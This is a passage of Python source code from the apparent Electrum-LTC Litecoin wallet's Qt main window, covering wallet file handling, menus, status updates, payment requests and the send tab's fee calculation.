self.show_warning(msg, title=_('Information'))
def open_wallet(self):
wallet_folder = self.get_wallet_folder()
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
wallet_folder = self.get_wallet_folder()
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
hist_menu.addAction("Plot", self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction("Export", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in OSX using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrum-ltc.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('litecoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-LTC",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Litecoin. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Litecoin system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/pooler/electrum-ltc/issues\">https://github.com/pooler/electrum-ltc/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum-LTC - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
            # Combine the transactions if there are more than three
tx_amount = len(self.tx_notifications)
if(tx_amount >= 3):
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
total_amount += v
self.notify(_("%(txs)s new transactions received: Total amount received in the new transactions %(amount)s") \
% { 'txs' : tx_amount, 'amount' : self.format_amount_and_units(total_amount)})
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
self.notify(_("New transaction received: %(amount)s") % { 'amount' : self.format_amount_and_units(v)})
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-LTC", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-LTC", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
if self.fee_unit == 0:
return format_satoshis(fee_rate/1000, False, self.num_zeros, 0, False) + ' sat/byte'
else:
return self.format_amount(fee_rate) + ' ' + self.base_unit() + '/kB'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'bits'
if self.decimal_point == 5:
return 'mLTC'
if self.decimal_point == 8:
return 'LTC'
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
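            # "follows" guards against feedback loops: when this handler
            # programmatically updates the other field below, that field's
            # textChanged handler must not write back in turn.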
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging (%d blocks)"%server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Litecoin address where the payment should be received. Note that each payment request uses a different Litecoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Litecoin addresses.'),
_('The Litecoin address never expires and will always be part of this Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(addr)
self.request_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address() or ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Litecoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Litecoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Litecoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
self.feerate_e.setAmount(fee_rate // 1000)
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if not edit_changed.get_amount():
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 2 if self.fee_unit else 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + '\n' +
_('Also, dust is not kept as change, but added to the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(QIcon(':icons/info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
        self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
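        # If the user has not yet entered a recipient, fall back to one of the
        # wallet's own addresses so a draft transaction can still be built for
        # fee estimation (see do_update_fee below).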
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.config.get('offline') and self.config.is_dynfee() and not self.config.has_fee_estimates():
self.statusBar().showMessage(_('Waiting for fee estimates...'))
return False
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
